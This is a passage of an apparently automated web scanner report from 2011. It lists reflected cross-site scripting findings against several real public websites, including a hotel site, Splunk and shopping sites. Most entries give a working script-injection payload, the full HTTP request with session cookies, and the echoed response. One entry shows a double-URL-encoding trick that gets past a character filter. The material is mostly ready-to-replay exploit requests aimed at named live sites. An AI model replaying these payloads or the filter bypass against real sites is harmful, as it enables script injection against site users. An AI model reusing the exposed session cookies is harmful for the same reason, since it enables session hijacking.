GET /contact/index.cfm?dd987"><script>alert(1)</script>09d3033758=1 HTTP/1.1 Host: www.pointehilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296936876900:ss=1296936876900; CFTOKEN=78240628; __utmz=69452433.1296944075.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; CFID=16197269; __utma=69452433.16251013.1296944075.1296944075.1296944075.1; BIGipServerIMS-6=773065226.20480.0000; __utmc=69452433; __utmb=69452433.1.10.1296944075;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 16:11:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <link rel="canonical" href="http://www.pointehilton.com/contact/index.cfm?dd987"><script>alert(1)</script>09d3033758=1" > ...[SNIP]...
4.351. http://www.pointehilton.com/employment/index.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pointehilton.com
Path:
/employment/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2e22"><script>alert(1)</script>d6b9d95a80b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /employment/index.cfm?b2e22"><script>alert(1)</script>d6b9d95a80b=1 HTTP/1.1 Host: www.pointehilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296936876900:ss=1296936876900; CFTOKEN=78240628; __utmz=69452433.1296944075.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; CFID=16197269; __utma=69452433.16251013.1296944075.1296944075.1296944075.1; BIGipServerIMS-6=773065226.20480.0000; __utmc=69452433; __utmb=69452433.1.10.1296944075;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 16:11:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <link rel="canonical" href="http://www.pointehilton.com/employment/index.cfm?b2e22"><script>alert(1)</script>d6b9d95a80b=1" > ...[SNIP]...
4.352. http://www.pointehilton.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pointehilton.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eba4"><script>alert(1)</script>5b859fb2210 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico?2eba4"><script>alert(1)</script>5b859fb2210=1 HTTP/1.1 Host: www.pointehilton.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=16197269; CFTOKEN=78240628; BIGipServerIMS-6=773065226.20480.0000; __utmz=69452433.1296944075.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=69452433.16251013.1296944075.1296944075.1296944075.1; __utmc=69452433; __utmb=69452433.1.10.1296944075; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296936876900:ss=1296936876900
Response
HTTP/1.1 404 Not Found Connection: close Date: Sat, 05 Feb 2011 22:35:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <link rel="canonical" href="http://www.pointehilton.com/404.cfm?404;http://www.pointehilton.com:80/favicon.ico?2eba4"><script>alert(1)</script>5b859fb2210=1" > ...[SNIP]...
4.353. http://www.pointehilton.com/sitemap/index.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pointehilton.com
Path:
/sitemap/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e331"><script>alert(1)</script>86cfb649072 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitemap/index.cfm?9e331"><script>alert(1)</script>86cfb649072=1 HTTP/1.1 Host: www.pointehilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296936876900:ss=1296936876900; CFTOKEN=78240628; __utmz=69452433.1296944075.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; CFID=16197269; __utma=69452433.16251013.1296944075.1296944075.1296944075.1; BIGipServerIMS-6=773065226.20480.0000; __utmc=69452433; __utmb=69452433.1.10.1296944075;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 16:11:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <link rel="canonical" href="http://www.pointehilton.com/sitemap/index.cfm?9e331"><script>alert(1)</script>86cfb649072=1" > ...[SNIP]...
4.354. http://www.pointehilton.com/special-offers/index.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pointehilton.com
Path:
/special-offers/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ce71"><script>alert(1)</script>42f3414c72b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /special-offers/index.cfm?2ce71"><script>alert(1)</script>42f3414c72b=1 HTTP/1.1 Host: www.pointehilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296936876900:ss=1296936876900; CFTOKEN=78240628; __utmz=69452433.1296944075.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; CFID=16197269; __utma=69452433.16251013.1296944075.1296944075.1296944075.1; BIGipServerIMS-6=773065226.20480.0000; __utmc=69452433; __utmb=69452433.1.10.1296944075;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 16:11:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <link rel="canonical" href="http://www.pointehilton.com/special-offers/index.cfm?2ce71"><script>alert(1)</script>42f3414c72b=1" > ...[SNIP]...
4.355. http://www.protopage.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.protopage.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d689'%3balert(1)//dc93207037d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2d689';alert(1)//dc93207037d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?2d689'%3balert(1)//dc93207037d=1 HTTP/1.1 Host: www.protopage.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a0a42<a>5296194bfd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /p-bdv9UMaVrliL2a0a42<a>5296194bfd7 HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html Content-Language: en Date: Sun, 06 Feb 2011 16:11:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]... <em> p-bdv9UMaVrliL2a0a42<a>5296194bfd7</em> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b61e"><a>69886d6c80c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /p-bdv9UMaVrliL26b61e"><a>69886d6c80c HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html Content-Language: en Date: Sun, 06 Feb 2011 16:11:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68f5e"><script>alert(1)</script>69f7787792 was submitted in the REST URL parameter 2. This input was echoed as 68f5e\"><script>alert(1)</script>69f7787792 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/gambar68f5e"><script>alert(1)</script>69f7787792 HTTP/1.1 Host: www.scare666.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:10:57 GMT Server: Apache X-Powered-By: PHP/5.2.16 Vary: Cookie,Accept-Encoding X-Pingback: http://www.scare666.com/xmlrpc.php Cache-Control: max-age=29030400, public Expires: Sat, 07 Jan 2012 22:10:57 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13688
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profile ...[SNIP]... <meta name="description" content="News about gambar68f5e\"><script>alert(1)</script>69f7787792 0 at scare666.com. Explore gambar68f5e\"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6823d<script>alert(1)</script>3f01d4d8a23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/gambar6823d<script>alert(1)</script>3f01d4d8a23 HTTP/1.1 Host: www.scare666.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:11:01 GMT Server: Apache X-Powered-By: PHP/5.2.16 Vary: Cookie,Accept-Encoding X-Pingback: http://www.scare666.com/xmlrpc.php Cache-Control: max-age=29030400, public Expires: Sat, 07 Jan 2012 22:11:01 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13653
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profile ...[SNIP]... <h2>gambar6823d<script>alert(1)</script>3f01d4d8a23</h2> ...[SNIP]...
4.360. http://www.shoppinga.de/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoppinga.de
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd2d5"><script>alert(1)</script>e3b5e976e9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?bd2d5"><script>alert(1)</script>e3b5e976e9e=1 HTTP/1.1 Host: www.shoppinga.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8fac7%253cscript%253ealert%25281%2529%253c%252fscript%253e7d5d02802ae was submitted in the REST URL parameter 1. This input was echoed as 8fac7<script>alert(1)</script>7d5d02802ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /getthumbnail.ashx8fac7%253cscript%253ealert%25281%2529%253c%252fscript%253e7d5d02802ae?width=182&file=9781556428517.gif HTTP/1.1 Host: www.slackbooks.com Proxy-Connection: keep-alive Referer: http://www.slackbooks.com/essentialknee Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=005mudrubsn3zlj31keaeuvq
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:36:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 12256
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.362. http://www.spiele365.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.spiele365.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24997"><script>alert(1)</script>8c1d99e1e7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?24997"><script>alert(1)</script>8c1d99e1e7c=1 HTTP/1.1 Host: www.spiele365.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:14:28 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.11 Set-Cookie: PHPSESSID=ehsibgt6v78cfkjerdu0r5trp06gq2le; path=/; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 24854
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <input type="hidden" name="return" value="/?24997"><script>alert(1)</script>8c1d99e1e7c=1" /> ...[SNIP]...
4.363. http://www.splunk.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8264f--><script>alert(1)</script>e135a08d7b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?8264f--><script>alert(1)</script>e135a08d7b0=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:53 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: b89e9b9024c0d76093fbc788f12f35711296944034 Last-Modified: Sat, 05 Feb 2011 22:13:54 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 55941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:dc="http://purl.org/d ...[SNIP]... <!-- SID:25 GEN:2011-02-05T14:13:54-08:00 URL:/?8264f--><script>alert(1)</script>e135a08d7b0=1 --> ...[SNIP]...
The value of the r request parameter is copied into an HTML comment. The payload 11427--><script>alert(1)</script>361b64d9efa was submitted in the r parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?r=header11427--><script>alert(1)</script>361b64d9efa HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:49 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 4255345ea8872fc035d4f1a1d367c5e61296944030 Last-Modified: Sat, 05 Feb 2011 22:13:50 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 56033
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:dc="http://purl.org/d ...[SNIP]... <!-- SID:25 GEN:2011-02-05T14:13:50-08:00 URL:/?r=header11427--><script>alert(1)</script>361b64d9efa --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93bd9'-alert(1)-'5693c75ab64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /base93bd9'-alert(1)-'5693c75ab64/ HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... geVersion( ) { var versionIndex = document.getElementById('docsVersionSelect').selectedIndex; var version = document.getElementById('docsVersionSelect')[versionIndex].value; var title = 'base93bd9'-alert(1)-'5693c75ab64/'; sajax_do_call( 'efSplunkAjaxChangeVersion', [version,title], AjaxChangeVersion_callback ); //window.location.href = "/base93bd9'-alert(1)-'5693c75ab64/"; }
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b19b8"><script>alert(1)</script>4678698329e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /baseb19b8"><script>alert(1)</script>4678698329e/ HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... <a href="http://www.splunk.com/index.php?module=roles&func=showloginform&redirecturl=http://www.splunk.com/baseb19b8"><script>alert(1)</script>4678698329e/"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload b1745--><script>alert(1)</script>cb09324f9b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
